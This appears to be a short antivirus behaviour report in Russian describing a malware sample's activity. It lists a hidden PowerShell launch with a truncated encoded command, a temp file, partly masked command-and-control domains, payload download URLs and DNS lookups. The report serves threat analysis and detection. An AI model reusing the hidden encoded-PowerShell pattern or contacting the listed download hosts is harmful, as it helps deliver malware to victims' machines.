Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABVAG4AdwB5AGwAbABvAHEAPQAnAE4AbAB3AGEAYQBzAHAAcgBtAGUAZwAnADsAJABLAGQAcQBvAGcAZgBmAGEAdQBoAGgAIAA9ACAAJwA0ADQANQAnADsAJABRAGMAbwBsAHEAeQByAGcAeQBuAD0AJwBEAGM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2000
- %TEMP%\1072210.cvr
- 'wi##yne.com':80
- 'wi##yne.com':443
- 'te###cekwan.com':80
- 'ja###ebel.com':443
- 'ba##.com.br':443
- 'sh##m.com':443
- http://www.wi##yne.com/install/5mp1/
- http://www.te###cekwan.com/wp-admin/ntc7om/
- 'wi##yne.com':443
- 'ja###ebel.com':443
- 'ba##.com.br':443
- 'sh##m.com':443
- DNS ASK wi##yne.com
- DNS ASK te###cekwan.com
- DNS ASK ja###ebel.com
- DNS ASK ba##.com.br
- DNS ASK sh##m.com